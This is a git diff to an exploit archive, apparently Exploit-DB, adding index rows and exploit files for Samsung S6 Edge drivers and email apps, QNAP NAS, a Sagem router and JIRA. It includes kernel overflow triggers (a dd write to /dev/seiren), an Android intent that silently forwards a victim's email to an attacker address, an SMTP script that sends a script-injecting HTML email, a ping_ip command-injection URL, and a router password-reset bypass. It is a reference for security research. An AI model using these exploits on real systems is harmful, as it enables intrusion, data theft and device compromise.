diff --git a/files.csv b/files.csv index b971bd7eb..0d1f8503e 100755 --- a/files.csv +++ b/files.csv @@ -34819,3 +34819,15 @@ id,file,description,date,author,platform,type,port 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0 +38546,platforms/php/webapps/38546.txt,"Telaen 2.7.x Open Redirection Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0 +38547,platforms/php/webapps/38547.txt,"CMS Gratis Indonesia 'config.php' PHP Code Injection Vulnerability",2013-06-04,"CWH Underground",php,webapps,0 +38548,platforms/php/webapps/38548.txt,"Telaen Information Disclosure Vulnerability",2013-06-03,"Manuel García Cárdenas",php,webapps,0 +38549,platforms/multiple/remote/38549.txt,"Apache Struts OGNL Expression Injection Vulnerability",2013-06-05,"Jon Passki",multiple,remote,0 +38550,platforms/cgi/webapps/38550.txt,"QNAP VioStor NVR and QNAP NAS Remote Code Execution Vulnerability",2013-06-05,"Tim Herres",cgi,webapps,0 +38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin Velocity Template Injection Vulnerability",2015-10-28,"Chris Wood",java,webapps,0 +38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 +38554,platforms/android/remote/38554.py,"Samsung SecEmailUI Script Injection",2015-10-28,"Google Security Research",android,remote,0 +38555,platforms/android/dos/38555.txt,"Samsung m2m1shot Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 +38556,platforms/android/dos/38556.txt,"Samsung seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 +38557,platforms/android/dos/38557.txt,"Samsung fimg2d FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 +38558,platforms/android/dos/38558.txt,"Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permissions Weakness",2015-10-28,"Google Security Research",android,dos,0 diff --git a/platforms/android/dos/38555.txt b/platforms/android/dos/38555.txt new file mode 100755 index 000000000..b32ad0562 --- /dev/null +++ b/platforms/android/dos/38555.txt @@ -0,0 +1,39 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=493 + +The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server + +The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot: + +static long m2m1shot_compat_ioctl32(struct file *filp, + unsigned int cmd, unsigned long arg) +{ +... + switch (cmd) { + case COMPAT_M2M1SHOT_IOC_PROCESS: + { + struct compat_m2m1shot data; + struct m2m1shot_task task; + int i, ret; + + memset(&task, 0, sizeof(task)); + + if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) { + dev_err(m21dev->dev, + "%s: Failed to read userdata\n", __func__); + return -EFAULT; + } + + ... + for (i = 0; i < data.buf_out.num_planes; i++) { + task.task.buf_out.plane[i].len = + data.buf_out.plane[i].len; + ... + } + +In this code snippet, the data.buf_out.num_planes value is attacker-controlled "u8" value, and is not bounds checked. However, task.task.buf_out.plane array is fixed in size (three elements), so a buffer overflow can occur during the loop shown above. + +Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c). + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38555.zip + diff --git a/platforms/android/dos/38556.txt b/platforms/android/dos/38556.txt new file mode 100755 index 000000000..3d188708f --- /dev/null +++ b/platforms/android/dos/38556.txt @@ -0,0 +1,22 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=491 + +The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflow a static global buffer: + +static ssize_t esa_write(struct file *file, const char *buffer, + size_t size, loff_t *pos) +{ + struct esa_rtd *rtd = file->private_data; + unsigned char *ibuf; +… + ibuf = rtd->ibuf0; +... + /* receive stream data from user */ + if (copy_from_user(ibuf, buffer, size)) { + esa_err("%s: failed to copy_from_user\n", __func__); + goto err; + } + +Note that the user supplied buffer and size parameters are not adequately bounds checked. The destination buffer is fixed size, so memory corruption can occur. A simple proof-of-concept from a privileged shell can be used to trigger the issue (tested on a Samsung S6 Edge): + +# dd if=/dev/zero of=/dev/seiren count=5000000 + diff --git a/platforms/android/dos/38557.txt b/platforms/android/dos/38557.txt new file mode 100755 index 000000000..2b16bbd92 --- /dev/null +++ b/platforms/android/dos/38557.txt @@ -0,0 +1,60 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=492 + +The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition. + +The key observation is in the locking routine definitions in fimg2d.h: + +#ifdef BLIT_WORKQUE +#define g2d_lock(x) do {} while (0) +#define g2d_unlock(x) do {} while (0) +#define g2d_spin_lock(x, f) spin_lock_irqsave(x, f) +#define g2d_spin_unlock(x, f) spin_unlock_irqrestore(x, f) +#else +#define g2d_lock(x) mutex_lock(x) +#define g2d_unlock(x) mutex_unlock(x) +#define g2d_spin_lock(x, f) do { f = 0; } while (0) +#define g2d_spin_unlock(x, f) do { f = 0; } while (0) +#endif + +This means that the g2d_lock/g2d_unlock routines are no-ops when BLIT_WORKQUE is defined, which appears to be the default configuration. Unfortunately the alternative spin lock routines are not used consistently with this configuration. For example, the FIMG2D_BITBLT_BLIT ioctl command (with notes annotated as "PZ"): + +ctx = file->private_data; /* PZ: ctx allocated at open(), lives on the heap. */ + +switch (cmd) { +case FIMG2D_BITBLT_BLIT: + + mm = get_task_mm(current); + if (!mm) { + fimg2d_err("no mm for ctx\n"); + return -ENXIO; + } + + g2d_lock(&ctrl->drvlock); /* PZ: This is a no-op. */ + + ctx->mm = mm; + + ret = fimg2d_add_command(ctrl, ctx, (struct fimg2d_blit __user *)arg); + if (ret) { + ... + } + + ret = fimg2d_request_bitblt(ctrl, ctx); /* PZ: Does stuff with the ctx. */ + if (ret) { + ... + } + + g2d_unlock(&ctrl->drvlock); /* PZ: Another no-op */ + +As the lock macros are no-ops, a second process can change ctx->mm when the original process is still using the same ctx->mm (as long as it has access to the same file descriptor). + +Reproduction steps: +Open /dev/fimg2d +Fork to get two processes with different mm’s with the access to the fd +Concurrently call the FIMG2D_BITBLT_BLIT ioctl from both processes. +One ioctl should have valid data, the other should fail + +At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38557.zip + diff --git a/platforms/android/dos/38558.txt b/platforms/android/dos/38558.txt new file mode 100755 index 000000000..db8c27e05 --- /dev/null +++ b/platforms/android/dos/38558.txt @@ -0,0 +1,25 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=490 + +The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content. + +Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND +Component: com.samsung.android.email.composer +Class Name: com.samsung.android.email.composer.service.QuickReplyService + +The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number). + +If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example: + +Intent intent = new Intent(); +intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND"); +intent.setClassName("com.samsung.android.email.composer", + "com.samsung.android.email.composer.service.QuickReplyService"); +intent.putExtra("data", "{'original-msg-id':1, " + + "'account-id':'project.zero.victim@gmail.com', " + + "'msg':'Hello World!'," + + "'title':'Hello Title'," + + "'toList':'project.zero.attacker@gmail.com'}"); +ComponentName name = MainActivity.this.startService(intent); + +No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder. + diff --git a/platforms/android/remote/38554.py b/platforms/android/remote/38554.py new file mode 100755 index 000000000..b428ffe7e --- /dev/null +++ b/platforms/android/remote/38554.py @@ -0,0 +1,52 @@ +# Source: https://code.google.com/p/google-security-research/issues/detail?id=494 + +''' +The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events. + +At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. + +This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server. + +Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed. +''' + +#!/usr/bin/env python + +import smtplib + +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText + +# Change the details here appropriate to your configuration +me = "attacker@gmail.com" +me_password = "THIS IS NOT REAL" +you = "project.zero.test@gmail.com" +smtp_server = "smtp.gmail.com" + +msg = MIMEMultipart('alternative') +msg['Subject'] = "Hello There!" +msg['From'] = me +msg['To'] = you + +text = "Hello There!" +html = """\ + +
+ ++ +
+ + +""" + +part1 = MIMEText(text, 'plain') +part2 = MIMEText(html, 'html') + +msg.attach(part1) +msg.attach(part2) + +s = smtplib.SMTP_SSL(smtp_server) +s.login(me, me_password) +s.sendmail(me, you, msg.as_string()) +s.quit() diff --git a/platforms/cgi/webapps/38550.txt b/platforms/cgi/webapps/38550.txt new file mode 100755 index 000000000..7be31360a --- /dev/null +++ b/platforms/cgi/webapps/38550.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/60354/info + +QNAP VioStor NVR and QNAP NAS are prone to a remote code-execution vulnerability. + +Successfully exploiting this issue may allow an attacker to execute arbitrary code with elevated privileges in the context of the user running the affected application. + +The following are vulnerable: + +QNAP VioStor NVR running firmware 4.0.3. +QNAP NAS + +http://www.example.com/cgi-bin/pingping.cgi?ping_ip=1;whoami \ No newline at end of file diff --git a/platforms/hardware/webapps/38553.txt b/platforms/hardware/webapps/38553.txt new file mode 100755 index 000000000..b057d666a --- /dev/null +++ b/platforms/hardware/webapps/38553.txt @@ -0,0 +1,34 @@ +================================================================================ +____ _ _ ____ _ _ ____ _ _ ___ ____ ____ +|__| | | |__| |__| |__| |_/ |__] |__| |__/ +| | |___ |___ | | | | | | | \_ |__] | | | \ + +================================================================================ + + +###################################################### +# Exploit Title: Sagem javascript injection +# Date: 27/10/15 +# Exploit Author: Soufiane Alami Hassani +# Version: FAST3304-V2 +# Tested on: [Windows 8.1 Pro] +# Category : webapps +# Facebook : soufiane.a.hassani +# Email : nios1515@gmail.com +###################################################### + + +########################### +#By Soufiane Alami Hassani# +########################### + +Vulnerability Description : You can change the password of your router even if you have not the access. + +Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password . + +######################## +Moroccan Are The Best . +######################## + + +mimic_button('goto: 9096..') \ No newline at end of file diff --git a/platforms/java/webapps/38551.py b/platforms/java/webapps/38551.py new file mode 100755 index 000000000..b5666f76a --- /dev/null +++ b/platforms/java/webapps/38551.py @@ -0,0 +1,45 @@ +############################################################################ +# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability +# Date: 2015-08-26 +# CVE ID: CVE-2015-5603 +# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html +# +# Product: JIRA and the HipChat for JIRA plugin. +# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0 +# Affected JIRA product versions: 6.3.5 <= version < 6.4.11 +# +# Discovered internally by Atlassian (vendor) +# Proof of concept script by Chris Wood